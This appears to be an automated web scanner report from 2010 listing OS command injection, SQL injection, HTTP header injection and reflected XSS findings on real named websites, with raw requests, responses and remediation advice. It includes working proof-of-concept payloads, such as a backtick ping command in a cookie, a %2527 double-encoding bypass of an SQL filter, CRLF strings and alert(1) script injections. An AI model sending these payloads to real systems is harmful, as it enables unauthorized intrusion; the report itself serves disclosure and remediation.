The __utmc cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload `ping%20-c%2020%20127.0.0.1` was submitted in the __utmc cookie. The application took 35911 milliseconds to respond to the request, compared with 1020 milliseconds for the original request, indicating that the injected command caused a time delay.
Issue background
Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:
The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defense can mitigate the impact of an attack even in the event that an attacker circumvents the input validation defenses.
Request
GET /people/dan.j.allen/blog/2010/10/20/speaking-at-utah-jug HTTP/1.1 Host: community.jboss.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rh_omni_tc=70160000000H4AjAAK; JSESSIONID=DDE1B860157F60EF7F32B1C587D04C48.node0; ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=""; __utmz=153813930.1289831027.1.1.utmcsr=jboss.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_sq=redhatglobal%2Credhatjbossorg%3D%2526pid%253Dhttp%25253A//community.jboss.org/account/login.jspa%2526oid%253DLogin%2526oidt%253D3%2526ot%253DSUBMIT%2526oi%253D428; jive.server.info="serverName=community.jboss.org:serverPort=80:contextPath=:localName=clearspace02.app.mwc.hst.phx2.redhat.com:localPort=8080:localAddr=10.5.106.15"; s_ria=flash%2010%7Csilverlight%20not%20detected; s_vnum=1292422844821%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1289831298721; __utma=153813930.861303267.1289831027.1289831027.1289831027.1; __utmc=153813930`ping%20-c%2020%20127.0.0.1`; __utmb=153813930.2.10.1289831027;
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The KeyWord parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the KeyWord parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Date: Mon, 15 Nov 2010 07:35:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 341 Content-Type: text/html Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string '3''.</font> ...[SNIP]...
The KeyWord parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the KeyWord parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
HTTP/1.1 500 Internal Server Error Date: Mon, 15 Nov 2010 07:28:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 353 Content-Type: text/html Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string '-- Keyword --''.</font> ...[SNIP]...
The RegionId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the RegionId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the RegionId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The RegionId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the RegionId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the RegionId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The SubCatId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the SubCatId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the SubCatId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The SubCatId parameter appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the SubCatId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the SubCatId request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
3.1. http://27.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://27.xg4ken.com
Path:
/media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload df8cc%0d%0afc9c0f60969 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=748&camp=13290&affcode=kw28552&inhURL=&cid=6561960191&networkType=search&url[]=https%3A%2F%2Fddb.kineticd.com%2Fads%2Fppc.aspx/x22&df8cc%0d%0afc9c0f60969=1 HTTP/1.1 Host: 27.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 15 Nov 2010 09:31:38 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=260e714d-3349-3fa8-629a-00004b889a33; expires=Sun, 13-Feb-2011 09:31:38 GMT; path=/; domain=.xg4ken.com Location: https://ddb.kineticd.com/ads/ppc.aspx/x22?df8cc fc9c0f60969=1 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of the url[] request parameter is copied into the Location response header. The payload f07da%0d%0a7c3685c0c33 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=748&camp=13290&affcode=kw28552&inhURL=&cid=6561960191&networkType=search&url[]=https%3A%2F%2Fddb.kineticd.com%2Fads%2Fppc.aspx/x22f07da%0d%0a7c3685c0c33 HTTP/1.1 Host: 27.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 15 Nov 2010 09:31:39 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=2ed9d8ec-0b69-c609-d39a-000059980589; expires=Sun, 13-Feb-2011 09:31:39 GMT; path=/; domain=.xg4ken.com Location: https://ddb.kineticd.com/ads/ppc.aspx/x22f07da 7c3685c0c33 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The value of REST URL parameter 1 is copied into the Location response header. The payload 91a3b%0d%0a8a3d72eaf29 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 7d98a%0d%0a59d7a244a36 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7d98a%0d%0a59d7a244a36/N4300.NYTimes/B5008440.7 HTTP/1.1 Host: ad.vulnerable.ad.partner Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/7d98a 59d7a244a36/N4300.NYTimes/B5008440.7: Date: Mon, 15 Nov 2010 11:44:07 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 72682%0d%0a5799f80cf0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 36239%0d%0ad7834691ffb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of REST URL parameter 1 is copied into the Location response header. The payload 89338%0d%0ae8e383c05b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
The value of the 11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq request parameter is copied into the location response header. The payload b8461%0d%0adb4a5794385 was submitted in the 11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq parameter. This caused a response containing an injected HTTP header.
Request
GET /n/80094/80572/www.sap.com/1043fg1;11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq=b8461%0d%0adb4a5794385&247cr=6349709945/x22 HTTP/1.1 Host: na.link.decdna.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 15 Nov 2010 09:41:26 GMT Server: Apache/1.3.33 (Unix) Pragma: no-cache Expires: Mon, 15 Nov 2010 09:41:26 GMT location: http://www.sap.comb8461 db4a5794385 Set-Cookie: %2edecdna%2enet/%2fn%2f80094/2/e=1289814086/80094/80572/1/0//8///769481856/0/0/109278422///0/1289814086/ct%2c/0/http%3a%2f%2fwww%2esap%2ecomb8461%0d%0adb4a5794385/26481749/0; expires=Wed, 15-Dec-2010 09:41:26 GMT; path=/n/80094; domain=.decdna.net; P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT" Set-Cookie: id=9304437677715620207; expires=Tue, 15-Nov-2011 09:41:26 GMT; path=/; domain=.decdna.net; Set-Cookie: name=9304437677698843084; path=/; domain=.decdna.net; Content-Length: 0 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 4 is copied into the location response header. The payload f7f81%0d%0a4d471187b11 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /n/80094/80572/f7f81%0d%0a4d471187b11/1043fg1;11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq=%2fmk%2fget%2fSEA13%3fSOURCEID%3d41%26campaigncode%3dCRM%2dXJ10%2dUSM%2dSEARCH18%26source%3dmsgsdkwus01%26tnt%3dcloud%26kw%3dcloud%2bcomputing%26dna%3d%3cx%3dthirdPartyTracking%28%27%2c%27%2c1%2c255%29%3e&247cr=6349709945/x22 HTTP/1.1 Host: na.link.decdna.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 15 Nov 2010 09:41:27 GMT Server: Apache/1.3.33 (Unix) Pragma: no-cache Expires: Mon, 15 Nov 2010 09:41:27 GMT location: http://f7f81 4d471187b11/mk/get/SEA13?SOURCEID=41&campaigncode=CRM-XJ10-USM-SEARCH18&source=msgsdkwus01&tnt=cloud&kw=cloud+computing&dna=<x=thirdPartyTracking(',',1,255)> Set-Cookie: %2edecdna%2enet/%2fn%2f80094/2/e=1289814087/80094/80572/1/0//8///769481856/0/0/109278422///0/1289814087/ct%2c/0/http%3a%2f%2ff7f81%0d%0a4d471187b11%2fmk%2fget%2fSEA13%3fSOURCEID%3d41%26campaigncode%3dCRM%2dXJ10%2dUSM%2dSEARCH18%26source%3dmsgsdkwus01%26tnt%3dcloud%26kw%3dcloud%252bcomputing%26dna%3d80572%252c8%252c0%252c109278422%252c769481856%252c1289814087%252c%252c26481749%252c0/26481749/0; expires=Wed, 15-Dec-2010 09:41:27 GMT; path=/n/80094; domain=.decdna.net; P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT" Set-Cookie: id=9322452076560646501; expires=Tue, 15-Nov-2011 09:41:27 GMT; path=/; domain=.decdna.net; Set-Cookie: name=9322452076560646613; path=/; domain=.decdna.net; Content-Length: 0 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
The value of REST URL parameter 3 is copied into the Set-Cookie response header. The payload 72cdf%0d%0a2b3a821784 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /2233/rq/72cdf%0d%0a2b3a821784/s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online%20storage/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22 HTTP/1.1 Host: pixel2233.everesttech.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 15 Nov 2010 09:43:05 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k Set-Cookie: everest_session_v2=NM1M4QCpAAAANmo; path=/; domain=.everesttech.net Set-Cookie: everest_g_v2=g_surferid~NM1M4QCpAAAANmo; path=/; domain=.everesttech.net; expires=Mon, 19-Nov-2029 20:23:05 GMT P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM" Cache-Control: no-cache, max-age=0 Set-Cookie: everest_cookie=ev_surferid~NM1M4QCpAAAANmo~ev_uid~2233~ev_sid~72cdf 2b3a821784~ev_clientid~s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online storage~ev_clickid~NM1M4QCpAAAANmo~ev_clicktime~20101115094305; path=/; domain=pixel2233.everesttech.net; expires=Mon, 19-Nov-2029 20:23:05 GMT Location: http://shop.trendmicro.com/safesync/sem/buy/10/?cm_mmc=Value_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22&ef_id=NM1M4QCpAAAANmo:20101115094305:s Expires: Mon, 15 Nov 2010 09:43:05 GMT Content-Length: 472 Keep-Alive: timeout=15, max=672 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://shop.trendmicro.com/safesync/sem/buy/10/ ...[SNIP]...
The value of REST URL parameter 4 is copied into the Set-Cookie response header. The payload c925c%0d%0aeac5f79dbde was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /2233/rq/3/c925c%0d%0aeac5f79dbde/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22 HTTP/1.1 Host: pixel2233.everesttech.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Mon, 15 Nov 2010 09:43:06 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k Set-Cookie: everest_session_v2=MyRM4QCqAQAAIkQ; path=/; domain=.everesttech.net Set-Cookie: everest_g_v2=g_surferid~MyRM4QCqAQAAIkQ; path=/; domain=.everesttech.net; expires=Mon, 19-Nov-2029 20:23:06 GMT P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM" Cache-Control: no-cache, max-age=0 Set-Cookie: everest_cookie=ev_surferid~MyRM4QCqAQAAIkQ~ev_uid~2233~ev_sid~3~ev_clientid~c925c eac5f79dbde~ev_clickid~MyRM4QCqAQAAIkQ~ev_clicktime~20101115094306; path=/; domain=pixel2233.everesttech.net; expires=Mon, 19-Nov-2029 20:23:06 GMT Location: http://shop.trendmicro.com/safesync/sem/buy/10/?cm_mmc=Value_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22&ef_id=MyRM4QCqAQAAIkQ:20101115094306:s Expires: Mon, 15 Nov 2010 09:43:06 GMT Content-Length: 472 Keep-Alive: timeout=15, max=973 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://shop.trendmicro.com/safesync/sem/buy/10/ ...[SNIP]...
The value of REST URL parameter 1 is copied into the Location response header. The payload d985f%0d%0a0cf54ea3fe2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /d985f%0d%0a0cf54ea3fe2/x22 HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /d985f 0cf54ea3fe2/x22/ Date: Mon, 15 Nov 2010 10:48:03 GMT Connection: close Content-Length: 85
The URL has moved to <a href="/d985f 0cf54ea3fe2/x22/">/d985f 0cf54ea3fe2/x22/</a>
The value of REST URL parameter 2 is copied into the Location response header. The payload 6b2a5%0d%0abc8e8fdeedd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /cloudcomputing/6b2a5%0d%0abc8e8fdeedd HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /cloudcomputing/6b2a5 bc8e8fdeedd/ Date: Mon, 15 Nov 2010 10:48:04 GMT Connection: close Content-Length: 107
The URL has moved to <a href="/cloudcomputing/6b2a5 bc8e8fdeedd/">/cloudcomputing/6b2a5 bc8e8fdeedd/</a>
The value of REST URL parameter 3 is copied into the Location response header. The payload 36d77%0d%0ac41153cb8fb was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /form/signup/36d77%0d%0ac41153cb8fb HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /form/signup/36d77 c41153cb8fb/ Date: Mon, 15 Nov 2010 10:48:08 GMT Connection: close Content-Length: 101
The URL has moved to <a href="/form/signup/36d77 c41153cb8fb/">/form/signup/36d77 c41153cb8fb/</a>
4. Cross-site scripting (reflected)previousnext There are 617 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the CategoryID request parameter is copied into a JavaScript rest-of-line comment. The payload 80331%0aalert(1)//da7467547cd was submitted in the CategoryID parameter. This input was echoed as 80331 alert(1)//da7467547cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYTULS_FSBOStaging/default.asp?CategoryID=BIZDIR80331%0aalert(1)//da7467547cd HTTP/1.1 Host: 209.11.106.150 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 15 Nov 2010 11:19:18 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Content-Length: 25743 Content-Type: text/html Set-Cookie: ASPSESSIONIDAAQTADCQ=BMIBILIAJOFCDJHKDMMIHHEA; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <TITLE>The New York Times: Classified Marketplace Place an Ad</TITLE> <meta name="keywords" content="Classified Marketp ...[SNIP]... <SCRIPT TYPE="text/javascript"> //------------------------------------------------------------------------- function Check_Step1() { var chk = "N" //if ('BIZDIR80331 alert(1)//da7467547cd' != 'BOSWTS') //{ //document.ListingType.LTypeId.checked = true; //return true //}
for (i = 0; i < document.ListingType.LTypeId.length; i ++) { if (document.ListingType.LTypeId[i].ch ...[SNIP]...
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e821b"-alert(1)-"5f7083f8c15 was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:18 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpte821b"-alert(1)-"5f7083f8c15&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "op ...[SNIP]...
The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f98f2'-alert(1)-'bb5252f170b was submitted in the ad parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:22 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmptf98f2'-alert(1)-'bb5252f170b&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\"> ...[SNIP]...
The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61202"-alert(1)-"7b65acf75e6 was submitted in the camp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Mon, 15 Nov 2010 07:19:09 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6563
